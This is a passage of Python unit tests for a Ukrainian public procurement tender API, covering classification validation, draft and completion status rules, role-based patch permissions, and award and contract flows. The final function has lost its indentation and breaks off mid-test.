    if get_now() > CPV_ITEMS_CLASS_FROM:
        cpv_code = self.initial_data["items"][0]['classification']['id']
        self.initial_data["items"][0]['classification']['id'] = '99999999-9'
    response = self.app.post_json(request_path, {'data': self.initial_data}, status=422)
    self.initial_data["items"][0]["additionalClassifications"][0]["scheme"] = data
    if get_now() > CPV_ITEMS_CLASS_FROM:
        self.initial_data["items"][0]['classification']['id'] = cpv_code
    self.assertEqual(response.status, '422 Unprocessable Entity')
    self.assertEqual(response.content_type, 'application/json')
    self.assertEqual(response.json['status'], 'error')
    if get_now() > CPV_ITEMS_CLASS_FROM:
        self.assertEqual(response.json['errors'], [
            {u'description': [{u'additionalClassifications': [
                u"One of additional classifications should be one of [ДК003, ДК015, ДК018, specialNorms]."]}],
             u'location': u'body', u'name': u'items'}
        ])
    else:
        self.assertEqual(response.json['errors'], [
            {u'description': [{u'additionalClassifications': [
                u"One of additional classifications should be one of [ДКПП, NONE, ДК003, ДК015, ДК018]."]}],
             u'location': u'body', u'name': u'items'}
        ])
    # CPV 33600000-6: exactly one INN additional classification is
    # required, so two INN entries must be rejected.
    addit_classif = [
        {"scheme": "INN",
         "id": "17.21.1",
         "description": "папір і картон гофровані, паперова й картонна тара"},
        {"scheme": "INN",
         "id": "17.21.1",
         "description": "папір і картон гофровані, паперова й картонна тара"}
    ]
    data = self.initial_data["items"][0]["classification"]['id']
    self.initial_data["items"][0]['classification']['id'] = u"33600000-6"
    orig_addit_classif = self.initial_data["items"][0]["additionalClassifications"]
    self.initial_data["items"][0]["additionalClassifications"] = addit_classif
    response = self.app.post_json(request_path, {'data': self.initial_data}, status=422)
    self.initial_data["items"][0]["additionalClassifications"] = orig_addit_classif
    self.initial_data["items"][0]["classification"]['id'] = data
    self.assertEqual(response.status, '422 Unprocessable Entity')
    self.assertEqual(response.json['errors'], [
        {u"location": u"body", u"name": u"items", u"description": [
            u"Item with classification.id=33600000-6 have to contain "
            u"exactly one additionalClassifications with scheme=INN"]}])
    # A 336* CPV code with additionalClassifications allows at most one
    # INN entry.
    addit_classif = [
        {"scheme": "INN",
         "id": "17.21.1",
         "description": "папір і картон гофровані, паперова й картонна тара"},
        {"scheme": "INN",
         "id": "17.21.1",
         "description": "папір і картон гофровані, паперова й картонна тара"}
    ]
    data = self.initial_data["items"][0]["classification"]['id']
    self.initial_data["items"][0]['classification']['id'] = u"33611000-6"
    orig_addit_classif = self.initial_data["items"][0]["additionalClassifications"]
    self.initial_data["items"][0]["additionalClassifications"] = addit_classif
    response = self.app.post_json(request_path, {'data': self.initial_data}, status=422)
    self.initial_data["items"][0]["additionalClassifications"] = orig_addit_classif
    self.initial_data["items"][0]["classification"]['id'] = data
    self.assertEqual(response.status, '422 Unprocessable Entity')
    self.assertEqual(response.json['errors'], [
        {u"location": u"body", u"name": u"items", u"description": [
            u"Item wich classification.id starts with 336 and contains "
            u"additionalClassification objects have to contain no more than "
            u"one additionalClassifications with scheme=INN"]}])
    # A single INN entry for a 336* CPV code is accepted.
    addit_classif = [
        {"scheme": "INN",
         "id": "17.21.1",
         "description": "папір і картон гофровані, паперова й картонна тара"}
    ]
    data = self.initial_data["items"][0]["classification"]['id']
    self.initial_data["items"][0]['classification']['id'] = u"33611000-6"
    orig_addit_classif = self.initial_data["items"][0]["additionalClassifications"]
    self.initial_data["items"][0]["additionalClassifications"] = addit_classif
    response = self.app.post_json(request_path, {'data': self.initial_data})
    self.initial_data["items"][0]["additionalClassifications"] = orig_addit_classif
    self.initial_data["items"][0]["classification"]['id'] = data
    self.assertEqual(response.status, '201 Created')
    # Non-INN schemes are accepted for this 336* CPV code.
    addit_classif = [
        {"scheme": "NotINN",
         "id": "17.21.1",
         "description": "папір і картон гофровані, паперова й картонна тара"},
        {"scheme": "NotINN",
         "id": "17.21.1",
         "description": "папір і картон гофровані, паперова й картонна тара"}
    ]
    data = self.initial_data["items"][0]["classification"]['id']
    self.initial_data["items"][0]['classification']['id'] = u'33652000-5'
    orig_addit_classif = self.initial_data["items"][0]["additionalClassifications"]
    self.initial_data["items"][0]["additionalClassifications"] = addit_classif
    response = self.app.post_json(request_path, {'data': self.initial_data})
    self.initial_data["items"][0]["additionalClassifications"] = orig_addit_classif
    self.initial_data["items"][0]["classification"]['id'] = data
    self.assertEqual(response.status, '201 Created')
    # --- procuringEntity contact point: telephone or email required ---
    data = self.initial_data["procuringEntity"]["contactPoint"]["telephone"]
    del self.initial_data["procuringEntity"]["contactPoint"]["telephone"]
    response = self.app.post_json(request_path, {'data': self.initial_data}, status=422)
    self.initial_data["procuringEntity"]["contactPoint"]["telephone"] = data
    self.assertEqual(response.status, '422 Unprocessable Entity')
    self.assertEqual(response.content_type, 'application/json')
    self.assertEqual(response.json['status'], 'error')
    self.assertEqual(response.json['errors'], [
        {u'description': {u'contactPoint': {u'email': [u'telephone or email should be present']}},
         u'location': u'body', u'name': u'procuringEntity'}
    ])
    # All items must share the same CPV group.
    data = self.initial_data["items"][0].copy()
    classification = data['classification'].copy()
    classification["id"] = u'19212310-1'
    data['classification'] = classification
    self.initial_data["items"] = [self.initial_data["items"][0], data]
    response = self.app.post_json(request_path, {'data': self.initial_data}, status=422)
    self.initial_data["items"] = self.initial_data["items"][:1]
    self.assertEqual(response.status, '422 Unprocessable Entity')
    self.assertEqual(response.content_type, 'application/json')
    self.assertEqual(response.json['status'], 'error')
    self.assertEqual(response.json['errors'], [
        {u'description': [u'CPV group of items be identical'], u'location': u'body', u'name': u'items'}
    ])
    # deliveryDate is mandatory on every item.
    data = deepcopy(self.initial_data)
    del data["items"][0]['deliveryDate']
    response = self.app.post_json(request_path, {'data': data}, status=422)
    self.assertEqual(response.status, '422 Unprocessable Entity')
    self.assertEqual(response.content_type, 'application/json')
    self.assertEqual(response.json['status'], 'error')
    self.assertEqual(response.json['errors'], [
        {u'description': [{u'deliveryDate': [u'This field is required.']}], u'location': u'body', u'name': u'items'}
    ])
def field_relatedLot(self):
    """An item's relatedLot is rejected for procedures that have no lots."""
    tender_data = deepcopy(self.initial_data)
    tender_data['items'][0]['relatedLot'] = uuid4().hex
    response = self.app.post_json('/tenders', {'data': tender_data}, status=422)
    self.assertEqual(response.status, '422 Unprocessable Entity')
    self.assertEqual(response.content_type, 'application/json')
    self.assertEqual(response.json['status'], 'error')
    expected_errors = [{
        u'description': [{u'relatedLot': [u'This option is not available']}],
        u'location': u'body',
        u'name': u'items',
    }]
    self.assertEqual(response.json['errors'], expected_errors)
def create_tender_generated(self):
    """Server-generated identifiers override any client-supplied ones."""
    payload = self.initial_data.copy()
    payload.update({'id': 'hash', 'doc_id': 'hash2', 'tenderID': 'hash3'})
    response = self.app.post_json('/tenders', {'data': payload})
    self.assertEqual(response.status, '201 Created')
    self.assertEqual(response.content_type, 'application/json')
    tender = response.json['data']
    # Build the expected top-level field set for this procedure type.
    expected_fields = set([
        u'id', u'dateModified', u'tenderID', u'status', u'items',
        u'value', u'procuringEntity', u'owner', u'procurementMethod',
        u'procurementMethodType', u'title', u'date',
    ])
    if u'procurementMethodDetails' in self.initial_data:
        expected_fields.add(u'procurementMethodDetails')
    # 'cause' only for plain negotiation; 'causeDescription' for any
    # negotiation-family procedure (substring match).
    if self.initial_data['procurementMethodType'] == "negotiation":
        expected_fields.add(u'cause')
    if "negotiation" in self.initial_data['procurementMethodType']:
        expected_fields.add(u'causeDescription')
    self.assertEqual(set(tender), expected_fields)
    # None of the supplied identifiers may leak into the created tender.
    self.assertNotEqual(payload['id'], tender['id'])
    self.assertNotEqual(payload['doc_id'], tender['id'])
    self.assertNotEqual(payload['tenderID'], tender['tenderID'])
def create_tender_draft(self):
    """A draft tender blocks data edits until it is switched to active."""
    draft_data = self.initial_data.copy()
    draft_data.update({'status': 'draft'})
    response = self.app.post_json('/tenders', {'data': draft_data})
    self.assertEqual(response.status, '201 Created')
    self.assertEqual(response.content_type, 'application/json')
    tender = response.json['data']
    token = response.json['access']['token']
    self.assertEqual(tender['status'], 'draft')
    patch_url = '/tenders/{}?acc_token={}'.format(tender['id'], token)
    # Data changes are forbidden while in draft.
    response = self.app.patch_json(patch_url, {'data': {'value': {'amount': 100}}}, status=403)
    self.assertEqual(response.status, '403 Forbidden')
    self.assertEqual(response.content_type, 'application/json')
    self.assertEqual(response.json['status'], 'error')
    self.assertEqual(response.json['errors'], [
        {u'description': u"Can't update tender in current (draft) status", u'location': u'body', u'name': u'data'}
    ])
    # The status switch itself is allowed.
    response = self.app.patch_json(patch_url, {'data': {'status': 'active'}})
    self.assertEqual(response.status, '200 OK')
    self.assertEqual(response.content_type, 'application/json')
    tender = response.json['data']
    self.assertEqual(tender['status'], 'active')
    # The new status is persisted.
    response = self.app.get('/tenders/{}'.format(tender['id']))
    self.assertEqual(response.status, '200 OK')
    self.assertEqual(response.content_type, 'application/json')
    tender = response.json['data']
    self.assertEqual(tender['status'], 'active')
def create_tender(self):
    """Happy-path tender creation plus response-format options.

    Checks the server-generated field set, the Location header, retrieval
    by id, JSONP and pretty-printed output modes, optional deliveryAddress
    parts, and the '99999999-9' classification with and without
    additionalClassifications.
    """
    # Listing starts out empty.
    response = self.app.get('/tenders')
    self.assertEqual(response.status, '200 OK')
    self.assertEqual(len(response.json['data']), 0)
    response = self.app.post_json('/tenders', {"data": self.initial_data})
    self.assertEqual(response.status, '201 Created')
    self.assertEqual(response.content_type, 'application/json')
    tender = response.json['data']
    tender_set = set(tender)
    if 'procurementMethodDetails' in tender_set:
        tender_set.remove('procurementMethodDetails')
    # 'cause' only for plain negotiation; 'causeDescription' for any
    # negotiation-family procedure (substring match).
    if "negotiation" == self.initial_data['procurementMethodType']:
        tender_set.remove(u'cause')
    if "negotiation" in self.initial_data['procurementMethodType']:
        tender_set.remove(u'causeDescription')
    # After subtracting the input, only server-generated fields remain.
    self.assertEqual(tender_set - set(self.initial_data), set(
        [u'id', u'date', u'dateModified', u'owner', u'tenderID', u'status', u'procurementMethod']))
    self.assertIn(tender['id'], response.headers['Location'])
    # The created tender round-trips unchanged through GET.
    response = self.app.get('/tenders/{}'.format(tender['id']))
    self.assertEqual(response.status, '200 OK')
    self.assertEqual(response.content_type, 'application/json')
    self.assertEqual(set(response.json['data']), set(tender))
    self.assertEqual(response.json['data'], tender)
    # JSONP wrapper via opt_jsonp.
    response = self.app.post_json('/tenders?opt_jsonp=callback', {"data": self.initial_data})
    self.assertEqual(response.status, '201 Created')
    self.assertEqual(response.content_type, 'application/javascript')
    self.assertIn('callback({"', response.body)
    # Pretty-printed output via query string and via request options.
    response = self.app.post_json('/tenders?opt_pretty=1', {"data": self.initial_data})
    self.assertEqual(response.status, '201 Created')
    self.assertEqual(response.content_type, 'application/json')
    self.assertIn('{\n "', response.body)
    response = self.app.post_json('/tenders', {"data": self.initial_data, "options": {"pretty": True}})
    self.assertEqual(response.status, '201 Created')
    self.assertEqual(response.content_type, 'application/json')
    self.assertIn('{\n "', response.body)
    # Optional deliveryAddress components may be omitted and are then
    # absent from the stored item.
    data = deepcopy(self.initial_data)
    del data["items"][0]['deliveryAddress']['postalCode']
    del data["items"][0]['deliveryAddress']['locality']
    del data["items"][0]['deliveryAddress']['streetAddress']
    del data["items"][0]['deliveryAddress']['region']
    response = self.app.post_json('/tenders', {'data': data})
    self.assertEqual(response.status, '201 Created')
    self.assertEqual(response.content_type, 'application/json')
    self.assertNotIn('postalCode', response.json['data']['items'][0]['deliveryAddress'])
    self.assertNotIn('locality', response.json['data']['items'][0]['deliveryAddress'])
    self.assertNotIn('streetAddress', response.json['data']['items'][0]['deliveryAddress'])
    self.assertNotIn('region', response.json['data']['items'][0]['deliveryAddress'])
    # '99999999-9' classification: additionalClassifications become
    # optional after NOT_REQUIRED_ADDITIONAL_CLASSIFICATION_FROM, and a
    # 'specialNorms' scheme is accepted when they are supplied.
    initial_data = deepcopy(self.initial_data)
    initial_data['items'][0]['classification']['id'] = "99999999-9"
    additional_classification =\
        initial_data['items'][0].pop('additionalClassifications')
    additional_classification[0]['scheme'] = "specialNorms"
    if get_now() > NOT_REQUIRED_ADDITIONAL_CLASSIFICATION_FROM:
        response = self.app.post_json('/tenders', {"data": initial_data})
        self.assertEqual(response.status, '201 Created')
        self.assertEqual(response.content_type, 'application/json')
        tender = response.json['data']
        self.assertEqual(tender['items'][0]['classification']['id'],
                         '99999999-9')
        self.assertNotIn('additionalClassifications', tender['items'][0])
    initial_data['items'][0]['additionalClassifications'] =\
        additional_classification
    response = self.app.post_json('/tenders', {"data": initial_data})
    self.assertEqual(response.status, '201 Created')
    self.assertEqual(response.content_type, 'application/json')
    tender = response.json['data']
    self.assertEqual(tender['items'][0]['classification']['id'], '99999999-9')
    self.assertEqual(
        tender['items'][0]['additionalClassifications'],
        additional_classification
    )
def patch_tender(self):
    """PATCH behaviour on a tender through its whole lifecycle.

    Verifies dateModified handling, read-only fields (dateModified,
    procuringEntity.kind), revision history, items-list replacement
    semantics, and that a completed tender rejects further edits.
    """
    response = self.app.get('/tenders')
    self.assertEqual(response.status, '200 OK')
    self.assertEqual(len(response.json['data']), 0)
    response = self.app.post_json('/tenders', {'data': self.initial_data})
    self.assertEqual(response.status, '201 Created')
    tender = response.json['data']
    owner_token = response.json['access']['token']
    dateModified = tender.pop('dateModified')
    # A real change bumps dateModified.
    response = self.app.patch_json('/tenders/{}?acc_token={}'.format(
        tender['id'], owner_token), {'data': {'procurementMethodRationale': 'Limited'}})
    self.assertEqual(response.status, '200 OK')
    self.assertEqual(response.content_type, 'application/json')
    new_tender = response.json['data']
    new_dateModified = new_tender.pop('dateModified')
    tender['procurementMethodRationale'] = 'Limited'
    self.assertEqual(tender, new_tender)
    self.assertNotEqual(dateModified, new_dateModified)
    # Patching dateModified itself is silently ignored.
    response = self.app.patch_json('/tenders/{}?acc_token={}'.format(
        tender['id'], owner_token), {'data': {'dateModified': new_dateModified}})
    self.assertEqual(response.status, '200 OK')
    self.assertEqual(response.content_type, 'application/json')
    new_tender2 = response.json['data']
    new_dateModified2 = new_tender2.pop('dateModified')
    self.assertEqual(new_tender, new_tender2)
    self.assertEqual(new_dateModified, new_dateModified2)
    # procuringEntity.kind cannot be changed by the owner.
    response = self.app.patch_json('/tenders/{}?acc_token={}'.format(tender['id'], owner_token),
                                   {'data': {'procuringEntity': {'kind': 'defense'}}})
    self.assertEqual(response.status, '200 OK')
    self.assertEqual(response.content_type, 'application/json')
    self.assertNotEqual(response.json['data']['procuringEntity']['kind'], 'defense')
    # Patches are recorded in the stored revision history as reverse ops.
    revisions = self.db.get(tender['id']).get('revisions')
    self.assertEqual(revisions[-1][u'changes'][0]['op'], u'remove')
    self.assertEqual(revisions[-1][u'changes'][0]['path'], u'/procurementMethodRationale')
    # Items-list replacement semantics.
    response = self.app.patch_json('/tenders/{}?acc_token={}'.format(
        tender['id'], owner_token), {'data': {'items': [self.initial_data['items'][0]]}})
    self.assertEqual(response.status, '200 OK')
    self.assertEqual(response.content_type, 'application/json')
    # An empty-dict item alongside an existing one ends up with the same
    # content but a distinct generated id.
    response = self.app.patch_json('/tenders/{}?acc_token={}'.format(
        tender['id'], owner_token), {'data': {'items': [{}, self.initial_data['items'][0]]}})
    self.assertEqual(response.status, '200 OK')
    self.assertEqual(response.content_type, 'application/json')
    item0 = response.json['data']['items'][0]
    item1 = response.json['data']['items'][1]
    self.assertNotEqual(item0.pop('id'), item1.pop('id'))
    self.assertEqual(item0, item1)
    # Shrinking back to a single item.
    response = self.app.patch_json('/tenders/{}?acc_token={}'.format(
        tender['id'], owner_token), {'data': {'items': [{}]}})
    self.assertEqual(response.status, '200 OK')
    self.assertEqual(response.content_type, 'application/json')
    self.assertEqual(len(response.json['data']['items']), 1)
    # Classification and additionalClassifications may be patched.
    response = self.app.patch_json('/tenders/{}?acc_token={}'.format(tender['id'], owner_token),
                                   {'data': {'items': [{"classification": {
                                       "scheme": "ДК021",
                                       "id": "55523100-3",
                                       "description": "Послуги з харчування у школах"
                                   }}]}})
    self.assertEqual(response.status, '200 OK')
    self.assertEqual(response.content_type, 'application/json')
    response = self.app.patch_json('/tenders/{}?acc_token={}'.format(tender['id'], owner_token),
                                   {'data': {'items': [{"additionalClassifications": [
                                       tender['items'][0]["additionalClassifications"][0] for i in range(3)
                                   ]}]}})
    self.assertEqual(response.status, '200 OK')
    self.assertEqual(response.content_type, 'application/json')
    response = self.app.patch_json('/tenders/{}?acc_token={}'.format(tender['id'], owner_token), {
        'data': {'items': [{"additionalClassifications": tender['items'][0]["additionalClassifications"]}]}})
    self.assertEqual(response.status, '200 OK')
    self.assertEqual(response.content_type, 'application/json')
    # The following operations are performed for a proper transition to the "Complete" tender status
    response = self.app.post_json('/tenders/{}/awards?acc_token={}'.format(
        tender['id'], owner_token), {'data': {'suppliers': [test_organization], 'status': 'pending'}})
    award_id = response.json['data']['id']
    response = self.app.patch_json('/tenders/{}/awards/{}?acc_token={}'.format(tender['id'], award_id, owner_token),
                                   {"data": {"qualified": True, "status": "active"}})
    response = self.app.get('/tenders/{}/contracts'.format(
        tender['id']))
    contract_id = response.json['data'][0]['id']
    response = self.app.post('/tenders/{}/contracts/{}/documents?acc_token={}'.format(
        tender['id'], contract_id, owner_token), upload_files=[('file', 'name.doc', 'content')])
    self.assertEqual(response.status, '201 Created')
    # Close the award complaint period directly in the DB so the
    # contract can be activated without waiting.
    save_tender = self.db.get(tender['id'])
    for i in save_tender.get('awards', []):
        if i.get('complaintPeriod', {}):  # works for negotiation tender
            i['complaintPeriod']['endDate'] = i['complaintPeriod']['startDate']
    self.db.save(save_tender)
    response = self.app.patch_json('/tenders/{}/contracts/{}?acc_token={}'.format(
        tender['id'], contract_id, owner_token), {'data': {'status': 'active'}})
    self.assertEqual(response.status, '200 OK')
    response = self.app.get('/tenders/{}'.format(tender['id']))
    self.assertEqual(response.status, '200 OK')
    self.assertEqual(response.json['data']['status'], 'complete')
    # A complete tender can no longer be patched.
    response = self.app.patch_json('/tenders/{}?acc_token={}'.format(tender['id'], owner_token),
                                   {'data': {'status': 'active'}}, status=403)
    self.assertEqual(response.status, '403 Forbidden')
    self.assertEqual(response.content_type, 'application/json')
    self.assertEqual(response.json['errors'][0]["description"], "Can't update tender in current (complete) status")
def tender_Administrator_change(self):
    """The administrator role may patch mode and procuringEntity identifier."""
    response = self.app.post_json('/tenders', {'data': self.initial_data})
    self.assertEqual(response.status, '201 Created')
    tender = response.json['data']
    # Switch to administrator credentials, remembering the current ones.
    authorization = self.app.authorization
    self.app.authorization = ('Basic', ('administrator', ''))
    response = self.app.patch_json('/tenders/{}'.format(tender['id']),
                                   {'data': {'mode': u'test',
                                             'procuringEntity': {"identifier": {"id": "00000000"}}}})
    self.assertEqual(response.status, '200 OK')
    self.assertEqual(response.content_type, 'application/json')
    self.assertEqual(response.json['data']['mode'], u'test')
    self.assertEqual(response.json['data']["procuringEntity"]["identifier"]["id"], "00000000")
    # Restore the original credentials and create a second tender.
    self.app.authorization = authorization
    response = self.app.post_json('/tenders', {'data': self.initial_data})
    self.assertEqual(response.status, '201 Created')
    self.app.authorization = ('Basic', ('administrator', ''))
    # NOTE(review): this patches the FIRST tender's id again, not the
    # tender created just above — possibly meant to target the new one;
    # confirm the intent before relying on this case.
    response = self.app.patch_json('/tenders/{}'.format(tender['id']), {'data': {'mode': u'test'}})
    self.assertEqual(response.status, '200 OK')
    self.assertEqual(response.content_type, 'application/json')
    self.assertEqual(response.json['data']['mode'], u'test')
# TenderNegotiationResourceTest
def field_relatedLot_negotiation(self):
    """An item's relatedLot must reference one of the tender's lots."""
    tender_data = deepcopy(self.initial_data)
    tender_data['items'][0]['relatedLot'] = uuid4().hex
    response = self.app.post_json('/tenders', {'data': tender_data}, status=422)
    self.assertEqual(response.status, '422 Unprocessable Entity')
    self.assertEqual(response.content_type, 'application/json')
    self.assertEqual(response.json['status'], 'error')
    expected_errors = [{
        u'description': [{u'relatedLot': [u'relatedLot should be one of lots']}],
        u'location': u'body',
        u'name': u'items',
    }]
    self.assertEqual(response.json['errors'], expected_errors)
def changing_tender_after_award(self):
    """Tender data becomes read-only once the first award is created."""
    response = self.app.post_json('/tenders',
                                  {"data": self.initial_data})
    tender_id = self.tender_id = response.json['data']['id']
    owner_token = response.json['access']['token']
    # create lot
    response = self.app.post_json('/tenders/{}/lots?acc_token={}'.format(tender_id, owner_token),
                                  {'data': self.test_lots_data[0]})
    self.assertEqual(response.status, '201 Created')
    self.assertEqual(response.content_type, 'application/json')
    first_lot = response.json['data']
    # create second lot
    response = self.app.post_json('/tenders/{}/lots?acc_token={}'.format(tender_id, owner_token),
                                  {'data': self.test_lots_data[0]})
    self.assertEqual(response.status, '201 Created')
    self.assertEqual(response.content_type, 'application/json')
    # changing the tender is still allowed before any award exists
    response = self.app.patch_json('/tenders/{}?acc_token={}'.format(tender_id, owner_token),
                                   {'data': {'description': 'New description'}})
    self.assertEqual(response.status, '200 OK')
    self.assertEqual(response.json['data']['description'], 'New description')
    # first award
    response = self.app.post_json('/tenders/{}/awards?acc_token={}'.format(tender_id, owner_token),
                                  {'data': {'suppliers': [test_organization], 'status': 'pending',
                                            'lotID': first_lot['id'], 'qualified': True}})
    self.assertEqual(response.status, '201 Created')
    self.assertEqual(response.content_type, 'application/json')
    # after the award, any tender change is forbidden
    response = self.app.patch_json('/tenders/{}?acc_token={}'.format(tender_id, owner_token),
                                   {'data': {'description': 'New description'}}, status=403)
    self.assertEqual(response.status, '403 Forbidden')
    self.assertEqual(response.content_type, 'application/json')
    self.assertEqual(response.json['errors'][0]["description"], "Can't update tender when there is at least one award.")
def initial_lot_date(self):
    """Lots supplied at creation, and lots added later, all carry a date."""
    # Create a tender whose initial data already contains two lots.
    tender_data = deepcopy(self.initial_data)
    tender_data['lots'] = deepcopy(self.test_lots_data) * 2
    response = self.app.post_json('/tenders',
                                  {"data": tender_data})
    tender_id = self.tender_id = response.json['data']['id']
    owner_token = response.json['access']['token']
    # Both initial lots must have been stamped with a date.
    response = self.app.get('/tenders/{}'.format(tender_id))
    stored_lots = response.json['data']['lots']
    self.assertIn('date', stored_lots[0])
    self.assertIn('date', stored_lots[1])
    # Add a third lot through the dedicated endpoint.
    response = self.app.post_json('/tenders/{}/lots?acc_token={}'.format(tender_id, owner_token),
                                  {'data': self.test_lots_data[0]})
    self.assertEqual(response.status, '201 Created')
    self.assertEqual(response.content_type, 'application/json')
    # Every lot, old and new, must expose a date.
    response = self.app.get('/tenders/{}'.format(tender_id))
    stored_lots = response.json['data']['lots']
    self.assertIn('date', stored_lots[0])
    self.assertIn('date', stored_lots[1])
    self.assertIn('date', stored_lots[2])
# TenderProcessTest
def tender_status_change(self):
    """Neither chronograph, broker nor the owner may force status 'complete'."""
    # Listing starts out empty.
    response = self.app.get('/tenders')
    self.assertEqual(response.json['data'], [])
    # Create a tender to experiment on.
    response = self.app.post_json('/tenders',
                                  {"data": self.initial_data})
    tender_id = self.tender_id = response.json['data']['id']
    owner_token = response.json['access']['token']
    complete_patch = {'data': {'status': 'complete'}}
    # The chronograph service is rejected outright.
    self.app.authorization = ('Basic', ('chronograph', ''))
    response = self.app.patch_json('/tenders/{}'.format(tender_id), complete_patch, status=403)
    self.assertEqual(response.status, '403 Forbidden')
    self.assertEqual(response.json['errors'][0]["description"], "Chronograph has no power over me!")
    # A broker without the access token is rejected as well.
    self.app.authorization = ('Basic', ('broker', ''))
    response = self.app.patch_json('/tenders/{}'.format(tender_id), complete_patch, status=403)
    self.assertEqual(response.status, '403 Forbidden')
    # The tender is still active.
    response = self.app.get('/tenders/{}'.format(tender_id))
    self.assertEqual(response.json['data']['status'], 'active')
    # Even the owner cannot jump straight to 'complete': the patch is
    # accepted, but the status stays 'active'.
    response = self.app.patch_json('/tenders/{}?acc_token={}'.format(tender_id, owner_token), complete_patch)
    self.assertEqual(response.status, '200 OK')
    self.assertEqual(response.json['data']['status'], 'active')
def single_award_tender(self):
    """End-to-end flow with a single award.

    First pass: award -> active -> contract signed -> tender complete.
    Second pass: award cancelled -> its contract cannot be signed and the
    tender stays active.
    """
    # empty tenders listing
    response = self.app.get('/tenders')
    self.assertEqual(response.json['data'], [])
    # create tender
    response = self.app.post_json('/tenders',
                                  {"data": self.initial_data})
    tender_id = self.tender_id = response.json['data']['id']
    owner_token = response.json['access']['token']
    # get awards
    response = self.app.get('/tenders/{}/awards?acc_token={}'.format(tender_id, owner_token))
    self.assertEqual(response.json['data'], [])
    # creating an award without the owner token is forbidden
    response = self.app.post_json('/tenders/{}/awards'.format(tender_id),
                                  {'data': {'suppliers': [test_organization],
                                            "value": {"amount": 500}}}, status=403)
    self.assertEqual(response.status, '403 Forbidden')
    response = self.app.post_json('/tenders/{}/awards?acc_token={}'.format(tender_id, owner_token),
                                  {'data': {'suppliers': [test_organization],
                                            "value": {"amount": 500}}})
    self.assertEqual(response.status, '201 Created')
    # get awards
    response = self.app.get('/tenders/{}/awards?acc_token={}'.format(tender_id, owner_token))
    # get pending award
    award_id = [i['id'] for i in response.json['data'] if i['status'] == 'pending'][0]
    # set award as active
    self.app.patch_json('/tenders/{}/awards/{}?acc_token={}'.format(tender_id, award_id, owner_token), {"data": {"qualified": True, "status": "active"}})
    # get contract id
    response = self.app.get('/tenders/{}'.format(tender_id))
    contract_id = response.json['data']['contracts'][-1]['id']
    # time travel: close the award complaint period directly in the DB
    # so the contract can be signed without waiting
    tender = self.db.get(tender_id)
    for i in tender.get('awards', []):
        if i.get('complaintPeriod', {}):  # reporting procedure does not have complaintPeriod
            i['complaintPeriod']['endDate'] = i['complaintPeriod']['startDate']
    self.db.save(tender)
    # sign contract
    self.app.patch_json('/tenders/{}/contracts/{}?acc_token={}'.format(tender_id, contract_id, owner_token), {"data": {"status": "active"}})
    # check status
    response = self.app.get('/tenders/{}'.format(tender_id))
    self.assertEqual(response.json['data']['status'], 'complete')
    # create new tender
    response = self.app.post_json('/tenders',
                                  {"data": self.initial_data})
    tender_id = self.tender_id = response.json['data']['id']
    owner_token = response.json['access']['token']
    # create award
    response = self.app.post_json('/tenders/{}/awards?acc_token={}'.format(tender_id, owner_token),
                                  {'data': {'suppliers': [test_organization],
                                            "qualified": True,
                                            "value": {"amount": 500}}})
    self.assertEqual(response.status, '201 Created')
    # get awards
    response = self.app.get('/tenders/{}/awards?acc_token={}'.format(tender_id, owner_token))
    self.assertEqual(len(response.json['data']), 1)
    # get last award
    award_id = [i['id'] for i in response.json['data'] if i['status'] == 'pending'][-1]
    # set award as active
    self.app.patch_json('/tenders/{}/awards/{}?acc_token={}'.format(tender_id, award_id, owner_token), {"data": {"status": "active"}})
    # get contract id
    response = self.app.get('/tenders/{}'.format(tender_id))
    contract = response.json['data']['contracts'][-1]
    self.assertEqual(contract['awardID'], award_id)
    # time travel
    tender = self.db.get(tender_id)
    for i in tender.get('awards', []):
        if i.get('complaintPeriod', {}):  # reporting procedure does not have complaintPeriod
            i['complaintPeriod']['endDate'] = i['complaintPeriod']['startDate']
    self.db.save(tender)
    # set award to cancelled
    response = self.app.patch_json('/tenders/{}/awards/{}?acc_token={}'.format(tender_id, award_id, owner_token),
                                   {"data": {"status": "cancelled"}})
    self.assertEqual(response.status, '200 OK')
    self.assertEqual(response.json['data']['status'], 'cancelled')
    # the contract of a cancelled award cannot be signed
    response = self.app.patch_json('/tenders/{}/contracts/{}?acc_token={}'.format(tender_id, contract['id'], owner_token),
                                   {"data": {"status": "active"}}, status=403)
    self.assertEqual(response.status, '403 Forbidden')
    self.assertEqual(response.json['errors'][0]["description"], "Can't update contract in current (cancelled) status")
    # tender status remains the same
    response = self.app.get('/tenders/{}'.format(tender_id))
    self.assertEqual(response.json['data']['status'], 'active')
def multiple_awards_tender(self):
# Flow under test: at most one non-cancelled award may exist at a time;
# cancelling the active award allows creating a new one, and signing the
# contract of the last active award moves the tender to 'complete'.
# NOTE(review): indentation was stripped from this dump; code lines are kept
# byte-identical.
# empty tenders listing
response = self.app.get('/tenders')
self.assertEqual(response.json['data'], [])
# create tender
response = self.app.post_json('/tenders',
{"data": self.initial_data})
tender_id = self.tender_id = response.json['data']['id']
owner_token = response.json['access']['token']
# get awards
response = self.app.get('/tenders/{}/awards?acc_token={}'.format(tender_id, owner_token))
self.assertEqual(response.json['data'], [])
# create award
# posting without the owner access token must be rejected
response = self.app.post_json('/tenders/{}/awards'.format(tender_id),
{'data': {'suppliers': [test_organization],
"qualified": True,
"value": {"amount": 500}}}, status=403)
self.assertEqual(response.status, '403 Forbidden')
response = self.app.post_json('/tenders/{}/awards?acc_token={}'.format(tender_id, owner_token),
{'data': {'suppliers': [test_organization],
"qualified": True,
"value": {"amount": 500}}})
self.assertEqual(response.status, '201 Created')
award = response.json['data']
response = self.app.patch_json('/tenders/{}/awards/{}?acc_token={}'.format(tender_id, award['id'], owner_token),
{"data": {"qualified": True, "status": "active"}})
self.assertEqual(response.status, '200 OK')
# a second award cannot be created while another award is active
response = self.app.post_json('/tenders/{}/awards?acc_token={}'.format(tender_id, owner_token),
{'data': {'suppliers': [test_organization],
"qualified": True,
'value': {"amount": 501}}}, status=403)
self.assertEqual(response.status, '403 Forbidden')
self.assertEqual(response.json['errors'][0]["description"], "Can't create new award while any (active) award exists")
# cancelling the active award frees the slot for a new award
response = self.app.patch_json('/tenders/{}/awards/{}?acc_token={}'.format(tender_id, award['id'], owner_token),
{"data": {"status": "cancelled"}})
response = self.app.post_json('/tenders/{}/awards?acc_token={}'.format(tender_id, owner_token),
{'data': {'suppliers': [test_organization],
"qualified": True,
"value": {"amount": 505}}})
self.assertEqual(response.status, '201 Created')
# get awards
response = self.app.get('/tenders/{}/awards?acc_token={}'.format(tender_id, owner_token))
self.assertEqual(len(response.json['data']), 2)
# get last award
award_id = [i['id'] for i in response.json['data'] if i['status'] == 'pending'][-1]
# set award as active
